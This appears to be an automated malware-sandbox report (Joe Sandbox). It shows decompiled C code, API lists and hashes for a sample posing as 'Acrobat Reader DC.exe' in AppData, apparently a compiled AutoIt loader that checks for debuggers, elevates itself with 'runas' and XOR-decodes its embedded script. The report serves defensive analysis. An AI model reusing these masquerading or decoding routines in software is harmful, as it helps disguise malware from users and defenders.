					_t165 = _v32;
				}
				if( *0x4a7f6c == 0) {
					E00411567("C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", _t165);
					_t174 = _t174 + 8;
					_t143 =  &_v32;
					_t127 = _t127 - 1;
					E00401A10( &_v84,  &_v32, _t165);
				}
				if(_t127 < 0) {
					_t127 = 0;
				}
				_t156 = _v12;
				_push(_t127 + 1);
				E0040E830(_v12, _t143, 1);
				_push(0);
				_t107 = E0040CF00(_t143, _v12, 0, 1);
				_t175 = _t174 + 0x14;
				_t167 = _t107;
				E00408F40(_v12, _t167);
				 *((intOrPtr*)(_t167 + 8)) = 1;
				 *_t167 = _t127;
				if(_t127 > 0) {
					_t115 = 0;
					while(1) {
						_t116 = _t115 + 1;
						_push(_t116);
						_a4 = _t116;
						_t117 = E0040CF00(_t143, _v12, 0, 1);
						_t175 = _t175 + 0xc;
						_t156 =  &_v32;
						E0040E6A0(_t143, _t156, _t117);
						_t143 = _t156;
						E00401A10( &_v84, _t156, _t117);
						if(_a4 >= _t127) {
							goto L12;
						}
						_t115 = _a4;
					}
				}
				L12:
				E00402250( &_v32);
				_t111 = E004019D0(E00408F40(_t156,  &_v48),  &_v64);
				_v84 = 0;
				_v64 = 0x484eac;
				E004019D0(_t111,  &_v64);
				_push(_v60);
				E004111DC();
				return E00402250( &_v80);
			}


































                                  0x00401f20
                                  0x00401f29
                                  0x00401f2c
                                  0x00401f36
                                  0x00401f39
                                  0x00401f3c
                                  0x00401f4c
                                  0x00401f57
                                  0x00401f62
                                  0x00401f65
                                  0x00401f6f
                                  0x00401f7c
                                  0x00401f89
                                  0x00401f90
                                  0x00401f98
                                  0x00401f9d
                                  0x00401fa5
                                  0x00401fac
                                  0x00401faf
                                  0x00401fbe
                                  0x00401fc5
                                  0x00401fcd
                                  0x00401fdc
                                  0x00401fe3
                                  0x00401fe8
                                  0x00401fee
                                  0x00401ff9
                                  0x00401ffe
                                  0x00402007
                                  0x0040200c
                                  0x00402011
                                  0x00428b0b
                                  0x00428b12
                                  0x00428b13
                                  0x00428b18
                                  0x00428b18
                                  0x0040201d
                                  0x00402022
                                  0x00402027
                                  0x00428b26
                                  0x00428b2d
                                  0x00428b2e
                                  0x00428b33
                                  0x00428b33
                                  0x00402033
                                  0x00402038
                                  0x0040203d
                                  0x00428b3d
                                  0x00428b4f
                                  0x00428b56
                                  0x00428b5b
                                  0x00428b67
                                  0x00428b75
                                  0x00428b7a
                                  0x00428b80
                                  0x00428b83
                                  0x00428b88
                                  0x00428b88
                                  0x00402049
                                  0x0040204e
                                  0x00402053
                                  0x00402058
                                  0x00428b90
                                  0x0040205e
                                  0x0040205e
                                  0x0040205e
                                  0x0040206e
                                  0x0040207c
                                  0x00402081
                                  0x00402084
                                  0x0040208a
                                  0x0040208d
                                  0x00402092
                                  0x00402092
                                  0x0040209d
                                  0x00428ba5
                                  0x00428baa
                                  0x00428bad
                                  0x00428bb3
                                  0x00428bb4
                                  0x00428bb4
                                  0x004020a5
                                  0x00428bc6
                                  0x00428bc6
                                  0x004020ab
                                  0x004020b1
                                  0x004020b6
                                  0x004020bb
                                  0x004020c1
                                  0x004020c6
                                  0x004020c9
                                  0x004020cb
                                  0x004020d0
                                  0x004020d7
                                  0x004020db
                                  0x004020dd
                                  0x004020df
                                  0x004020e2
                                  0x004020e3
                                  0x004020e8
                                  0x004020eb
                                  0x004020f0
                                  0x004020f3
                                  0x004020f8
                                  0x004020fd
                                  0x00402102
                                  0x0040210a
                                  0x00000000
                                  0x00000000
                                  0x00428bbe
                                  0x00428bbe
                                  0x004020df
                                  0x00402110
                                  0x00402113
                                  0x00402123
                                  0x00402128
                                  0x0040212f
                                  0x00402136
                                  0x0040213e
                                  0x0040213f
                                  0x00402155

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,00000104,?), ref: 00401F4C
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • __wcsicoll.LIBCMT ref: 00402007
                                  • __wcsicoll.LIBCMT ref: 0040201D
                                  • __wcsicoll.LIBCMT ref: 00402033
                                    • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                  • __wcsicoll.LIBCMT ref: 00402049
                                  • _wcscpy.LIBCMT ref: 0040207C
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,00000104), ref: 00428B5B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe$CMDLINE$CMDLINERAW
                                  • API String ID: 3948761352-1298289597
                                  • Opcode ID: fc6f6475a80a7344a840dcdaee6076005090c92f926202b5f3dea37786da349d
                                  • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                  • Opcode Fuzzy Hash: fc6f6475a80a7344a840dcdaee6076005090c92f926202b5f3dea37786da349d
                                  • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 98%
                                  			E0040D590(short* __eax, char __ecx, void* __eflags, void* __fp0) {
				char _v5;
				char _v6;
				short* _v24;
				short _v556;
				short _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				intOrPtr _t28;
				int _t31;
				char _t32;
				void* _t53;
				intOrPtr _t56;
				intOrPtr _t57;
				char _t60;
				short* _t73;
				void* _t80;

				_t89 = __fp0;
				_t80 = __eflags;
				_t60 = __ecx;
				_t73 = __eax;
				GetCurrentDirectoryW(0x104,  &_v556);
				E00401F20(_t60, _t80, _t73); // executed
				if(IsDebuggerPresent() != 0) {
					return MessageBoxA(0, "This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.", 0x484c92, 0x10);
				}
				_t25 =  *0x4a7f54; // 0x4
				if(_t25 == 0) {
					 *0x4974f4 = 0xffffffff;
					return SetCurrentDirectoryW( &_v556);
					L12:
				}
				_v5 = 0;
				if(_t25 == 1) {
					_t56 =  *0x4a7f5c; // 0xa72f18
					_v6 = 0;
					E00403A50(_t56, _t60, 0x4a90e8, 1, 0xffffffff);
					_t69 =  *0x4974e8;
					_t57 = _v6;
					 *0x4a90eb =  *0x4974e8;
					L5:
					_t28 =  *0x4a7f54; // 0x4
					if(E00401460(_t60, _t69, ?str?, _t28) != 0) {
						E0040EC50(0x4a90e8);
						_t31 = SetCurrentDirectoryW( &_v556);
						 *0x4974f4 = 1;
						return _t31;
					}
					if(_t57 == 1) {
						_t32 = E00432FEE();
						__eflags = _t32;
						if(_t32 != 0) {
							goto L7;
						}
						GetModuleFileNameW(0,  &_v1084, 0x104);
						__eflags = _v5;
						if(__eflags == 0) {
							ShellExecuteW(GetForegroundWindow(), L"runas",  &_v1084, _t73,  &_v556, 1);
						} else {
							_t79 =  &_v24;
							E00401B10("\"",  &_v24, __eflags);
							E0040D200(_t79, _t60, 0x4a7f6c, _t89);
							E0040D200(_t79, _t60, "\"", _t89);
							ShellExecuteW(GetForegroundWindow(), L"runas",  &_v1084, _v24,  &_v556, 1);
							E00402250(_t79);
						}
						L11:
						E0040EC50(0x4a90e8);
						return SetCurrentDirectoryW( &_v556);
						goto L12;
					}
					L7:
					E00410390(); // executed
					E00410570();
					if( *0x4a7f58 == 0) {
						E0040E0C0(0x4a8710, _t89);
					}
					E004091E0(0x4a8178, _t69, _t89, 1); // executed
					if( *0x4a7f58 == 0) {
						E00401000(0x4a8710);
					}
					goto L11;
				}
				_t53 = E0040F520(0x4a7f6c, 0x4a90e8, __fp0, 0x4a7f54); // executed
				if(_t53 == 0) {
					 *0x4974f4 = 1;
					return SetCurrentDirectoryW( &_v556);
					goto L12;
				} else {
					_t60 =  *0x4a90e8; // 0x1
					_t57 =  *0x4a90e9; // 0x0
					_t69 =  &_v1084;
					 *0x4a7f58 = _t60;
					GetFullPathNameW("C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", 0x104,  &_v1084, 0x4a7f50);
					goto L5;
				}
			}





















                                  0x0040d590
                                  0x0040d590
                                  0x0040d590
                                  0x0040d59c
                                  0x0040d5aa
                                  0x0040d5b1
                                  0x0040d5be
                                  0x00000000
                                  0x0042e1c9
                                  0x0040d5c4
                                  0x0040d5cb
                                  0x0042e1da
                                  0x00000000
                                  0x0040d699
                                  0x0040d699
                                  0x0040d5d1
                                  0x0040d5dd
                                  0x0042e1ea
                                  0x0042e1f4
                                  0x0042e1f8
                                  0x0042e1fd
                                  0x0042e203
                                  0x0042e206
                                  0x0040d62b
                                  0x0040d62b
                                  0x0040d63d
                                  0x0042e22c
                                  0x0042e238
                                  0x0042e23e
                                  0x00000000
                                  0x0042e23e
                                  0x0040d646
                                  0x0042e24d
                                  0x0042e252
                                  0x0042e254
                                  0x00000000
                                  0x00000000
                                  0x0042e268
                                  0x0042e26e
                                  0x0042e272
                                  0x0042e2e8
                                  0x0042e274
                                  0x0042e279
                                  0x0042e27c
                                  0x0042e288
                                  0x0042e294
                                  0x0042e2b9
                                  0x0042e2c1
                                  0x0042e2c1
                                  0x0040d688
                                  0x0040d68d
                                  0x00000000
                                  0x00000000
                                  0x0040d692
                                  0x0040d64c
                                  0x0040d64c
                                  0x0040d651
                                  0x0040d65d
                                  0x0040d664
                                  0x0040d664
                                  0x0040d670
                                  0x0040d67c
                                  0x0040d683
                                  0x0040d683
                                  0x00000000
                                  0x0040d67c
                                  0x0040d5f0
                                  0x0040d5f7
                                  0x0042e217
                                  0x00000000
                                  0x00000000
                                  0x0040d5fd
                                  0x0040d5fd
                                  0x0040d603
                                  0x0040d60e
                                  0x0040d61f
                                  0x0040d625
                                  0x00000000
                                  0x0040d625

                                  APIs
                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                    • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,00000104,?), ref: 00401F4C
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                    • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                  • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                  • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                    • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                  • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                  • MessageBoxA.USER32 ref: 0042E1C9
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                  • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                    • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                    • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                    • Part of subcall function 00410390: LoadImageW.USER32 ref: 0041040E
                                    • Part of subcall function 00410390: RegisterClassExW.USER32 ref: 0041045D
                                    • Part of subcall function 00410570: CreateWindowExW.USER32 ref: 004105A5
                                    • Part of subcall function 00410570: CreateWindowExW.USER32 ref: 004105CE
                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                    • Part of subcall function 0040E0C0: _memset.LIBCMT ref: 0040E0E2
                                    • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                  • String ID: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                  • API String ID: 2493088469-2808984075
                                  • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                  • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                  • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                  • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 87%
                                  			E00452719(void* __eflags, signed int _a4, intOrPtr _a8, char _a12) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v548;
				char _v1076;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t37;
				void* _t52;
				void* _t54;
				signed int _t59;
				void* _t63;
				void* _t64;
				intOrPtr* _t89;
				void* _t90;
				void* _t91;
				void* _t93;
				void* _t96;
				void* _t97;

				_t99 = __eflags;
				_t89 = _a4;
				_v8 = 0;
				while(1) {
					E00414D04( &_v16, 1, 4,  *_t89);
					E0044AFEF( &_v16, _t99,  &_v16, 4, 0x18ee);
					_v12 = 0;
					_t37 = E00414D30( &_v16, "FILE");
					_t93 = _t91 + 0x18;
					_t100 = _t37;
					if(_t37 != 0) {
						break;
					}
					_v8 = _v8 + 1;
					E00414D04( &_a4, 4, 1,  *_t89);
					_t83 = _a4 ^ 0x0000adbc;
					_t63 = (_a4 ^ 0x0000adbc) + (_a4 ^ 0x0000adbc);
					E00414D04( &_v548, 1, _t63,  *_t89);
					E0044AFEF( &_v548, _t100,  &_v548, _t63, _t83 + 0xb33f);
					 *((short*)(_t90 + _t63 - 0x220)) = 0;
					E00411567( &_v1076,  &_v548);
					E00414D04( &_a4, 4, 1,  *_t89);
					_t86 = _a4 ^ 0x0000f820;
					_t64 = (_a4 ^ 0x0000f820) + (_a4 ^ 0x0000f820);
					E00414D04( &_v548, 1, _t64,  *_t89);
					E0044AFEF( &_v548, _t100,  &_v548, _t64, _t86 + 0xf479);
					_t23 =  &_a12; // 0x452944
					 *((short*)(_t90 + _t64 - 0x220)) = 0;
					E00411567( *_t23,  &_v548);
					_t88 = _a8;
					_t79 =  &_v1076;
					_t52 = E0041313C( &_v1076, _a8);
					_t96 = _t93 + 0x58;
					if(_t52 == 0) {
						L6:
						__eflags = 0;
						return 0;
					} else {
						_t54 = E0041313C(_t88, "*");
						_t97 = _t96 + 8;
						if(_t54 != 0) {
							L5:
							_push(1);
							_push(1);
							_push( *_t89); // executed
							E004150D1(_t64, _t79, _t88, _t89, _t99); // executed
							_t30 =  &_v20; // 0x452944
							E00414D04(_t30, 4, 1,  *_t89);
							_t31 =  &_v20; // 0x452944
							_t59 =  *_t31 ^ 0x000087bc;
							_v20 = _t59;
							_push(1);
							_push(_t59 + 0x18);
							_push( *_t89); // executed
							E004150D1(_t64, _t30, _t88, _t89, _t99); // executed
							_t91 = _t97 + 0x28;
							continue;
						} else {
							_t99 = _v8 - _t54;
							if(_v8 == _t54) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
					L8:
				}
				return 6;
				goto L8;
			}

























                                  0x00452719
                                  0x00452724
                                  0x00452728
                                  0x0045272f
                                  0x0045273e
                                  0x00452751
                                  0x0045275f
                                  0x00452763
                                  0x00452768
                                  0x0045276b
                                  0x0045276d
                                  0x00000000
                                  0x00000000
                                  0x00452775
                                  0x00452780
                                  0x0045278b
                                  0x00452791
                                  0x0045279e
                                  0x004527b5
                                  0x004527ca
                                  0x004527d2
                                  0x004527e2
                                  0x004527ed
                                  0x004527f3
                                  0x00452800
                                  0x00452817
                                  0x0045281c
                                  0x00452829
                                  0x00452831
                                  0x00452836
                                  0x00452839
                                  0x00452841
                                  0x00452846
                                  0x0045284b
                                  0x004528a4
                                  0x004528a4
                                  0x004528ac
                                  0x0045284d
                                  0x00452853
                                  0x00452858
                                  0x0045285d
                                  0x00452864
                                  0x00452866
                                  0x00452868
                                  0x0045286a
                                  0x0045286b
                                  0x00452878
                                  0x0045287e
                                  0x00452883
                                  0x00452886
                                  0x0045288b
                                  0x00452891
                                  0x00452893
                                  0x00452896
                                  0x00452897
                                  0x0045289c
                                  0x00000000
                                  0x0045285f
                                  0x0045285f
                                  0x00452862
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00452862
                                  0x0045285d
                                  0x00000000
                                  0x0045284b
                                  0x004528ba
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fread_nolock$_fseek_wcscpy
                                  • String ID: D)E$D)E$FILE
                                  • API String ID: 3888824918-361185794
                                  • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                  • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                  • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                  • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 87%
                                  			E0040E360(intOrPtr __eax, void* __ecx, void* __eflags) {
				char _v524;
				char _v1052;
				short _v1580;
				char _v1596;
				short _v1598;
				short _v1600;
				void* __edi;
				void* __esi;
				intOrPtr _t37;
				intOrPtr _t44;
				signed int _t45;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int _t55;
				signed int _t63;
				short* _t65;
				intOrPtr _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t89;
				intOrPtr _t93;
				intOrPtr _t94;
				void* _t95;
				void* _t96;
				void* _t98;
				signed int _t103;
				void* _t107;
				void* _t108;

				_t109 = __eflags;
				_push(_t98);
				_push(_t95);
				_push(0x400);
				 *0x4a90e8 = 0;
				 *0x4a90ec = __eax;
				 *0x4a90f0 = 0;
				 *0x4a90f4 = 0;
				 *0x4a90f8 = 0;
				 *0x4a90fc = 0;
				 *0x4a9100 = 0x485a88;
				 *0x4a9104 = 0;
				 *0x4a9108 = 0;
				 *0x4a910c = 0;
				 *0x4a9110 = 0x485a88;
				 *0x4a9114 = 0;
				 *0x4a9118 = 0;
				 *0x4a911c = 0;
				 *0x4a9124 = 0;
				 *0x4a912c = 0;
				 *0x4a9130 = 0x66; // executed
				_t37 = E004115D7(_t95, _t98, __eflags); // executed
				 *0x4a9120 = _t37;
				GetModuleFileNameW(0,  &_v1580, 0x104);
				E00413A0E( &_v1580,  &_v524,  &_v1052, 0, 0);
				E00413A5A( &_v1052, L"Include", 0x104);
				E00413A9E( &_v1580,  &_v524,  &_v1052, 0, 0);
				_push(0x20a);
				_t44 = E004115D7(_t95, _t98, _t109);
				_t89 =  *0x4a9124; // 0x1
				_t75 =  *0x4a9120; // 0xa76d30
				 *((intOrPtr*)(_t75 + _t89 * 4)) = _t44;
				_t45 =  *0x4a9124; // 0x1
				_t76 =  *0x4a9120; // 0xa76d30
				 *0x4a9124 = _t45 + 1;
				E00411567( *((intOrPtr*)(_t76 + _t45 * 4)),  &_v1580);
				_t107 = (_t103 & 0xfffffff8) - 0x63c + 0x44;
				E0040BC70( &_v1596, _t109);
				_t49 = E0040E4C0( &_v1596, _t109); // executed
				if(_t49 != 0) {
					_t96 = 0;
					__eflags = 0;
					_v1580 = 0;
					while(1) {
						_t100 =  &_v1596;
						_v1600 =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
						_v1598 = 0;
						__eflags =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
						if(__eflags == 0) {
							goto L6;
						}
						L4:
						_t65 = E00401C90(_t96, _t100, __eflags);
						__eflags =  *_t65 - 0x3b;
						if( *_t65 == 0x3b) {
							goto L6;
						}
						E00411536( &_v1580,  &_v1600);
						_t107 = _t107 + 8;
						_t96 = _t96 + 1;
						while(1) {
							_t100 =  &_v1596;
							_v1600 =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
							_v1598 = 0;
							__eflags =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
							if(__eflags == 0) {
								goto L6;
							}
							goto L4;
						}
						L6:
						_t53 = E004111C1( &_v1580);
						_t108 = _t107 + 4;
						__eflags = _t53;
						if(__eflags != 0) {
							_t63 = E004111C1( &_v1580);
							_t108 = _t108 + 4;
							__eflags =  *((short*)(_t108 + 0x1e + _t63 * 2)) - 0x5c;
							if(__eflags != 0) {
								E00411536( &_v1580, "\\");
								_t108 = _t108 + 8;
							}
						}
						_push(0x20a);
						_t54 = E004115D7(_t96, _t100, __eflags);
						_t80 =  *0x4a9124; // 0x1
						_t93 =  *0x4a9120; // 0xa76d30
						 *((intOrPtr*)(_t93 + _t80 * 4)) = _t54;
						_t55 =  *0x4a9124; // 0x1
						_t94 =  *0x4a9120; // 0xa76d30
						 *0x4a9124 = _t55 + 1;
						E00412FBA( *((intOrPtr*)(_t94 + _t55 * 4)),  &_v1580, 0x104);
						_t107 = _t108 + 0x10;
						_v1580 = 0;
						__eflags =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
						if(__eflags == 0) {
							goto L1;
						} else {
							_t96 = _t96 + 1;
							continue;
						}
					}
				}
				L1:
				E00402250( &_v1596);
				return 0x4a90e8;
			}
































                                  0x0040e360
                                  0x0040e36f
                                  0x0040e370
                                  0x0040e371
                                  0x0040e376
                                  0x0040e37c
                                  0x0040e381
                                  0x0040e387
                                  0x0040e38d
                                  0x0040e393
                                  0x0040e399
                                  0x0040e3a3
                                  0x0040e3a9
                                  0x0040e3af
                                  0x0040e3b5
                                  0x0040e3bf
                                  0x0040e3c5
                                  0x0040e3cb
                                  0x0040e3d1
                                  0x0040e3d7
                                  0x0040e3dd
                                  0x0040e3e7
                                  0x0040e3fa
                                  0x0040e3ff
                                  0x0040e41c
                                  0x0040e433
                                  0x0040e44f
                                  0x0040e454
                                  0x0040e459
                                  0x0040e45e
                                  0x0040e464
                                  0x0040e46a
                                  0x0040e46d
                                  0x0040e472
                                  0x0040e482
                                  0x0040e487
                                  0x0040e48c
                                  0x0040e493
                                  0x0040e49c
                                  0x0040e4a3
                                  0x00427501
                                  0x00427503
                                  0x00427505
                                  0x0042750a
                                  0x0042750a
                                  0x00427518
                                  0x0042751d
                                  0x00427527
                                  0x0042752a
                                  0x00000000
                                  0x00000000
                                  0x0042752c
                                  0x0042752c
                                  0x00427531
                                  0x00427535
                                  0x00000000
                                  0x00000000
                                  0x00427541
                                  0x00427546
                                  0x00427549
                                  0x0042750a
                                  0x0042750a
                                  0x00427518
                                  0x0042751d
                                  0x00427527
                                  0x0042752a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042752a
                                  0x0042754c
                                  0x00427551
                                  0x00427556
                                  0x00427559
                                  0x0042755b
                                  0x00427562
                                  0x00427567
                                  0x0042756a
                                  0x00427570
                                  0x0042757c
                                  0x00427581
                                  0x00427581
                                  0x00427570
                                  0x00427584
                                  0x00427589
                                  0x0042758e
                                  0x00427594
                                  0x0042759a
                                  0x0042759d
                                  0x004275a2
                                  0x004275ac
                                  0x004275bc
                                  0x004275c3
                                  0x004275ca
                                  0x004275d4
                                  0x004275d7
                                  0x00000000
                                  0x004275dd
                                  0x004275dd
                                  0x00000000
                                  0x004275dd
                                  0x004275d7
                                  0x0042750a
                                  0x0040e4a9
                                  0x0040e4ad
                                  0x0040e4bd

                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                  • __wsplitpath.LIBCMT ref: 0040E41C
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcsncat.LIBCMT ref: 0040E433
                                  • __wmakepath.LIBCMT ref: 0040E44F
                                    • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • _wcscpy.LIBCMT ref: 0040E487
                                    • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                  • _wcscat.LIBCMT ref: 00427541
                                  • _wcslen.LIBCMT ref: 00427551
                                  • _wcslen.LIBCMT ref: 00427562
                                  • _wcscat.LIBCMT ref: 0042757C
                                  • _wcsncpy.LIBCMT ref: 004275BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
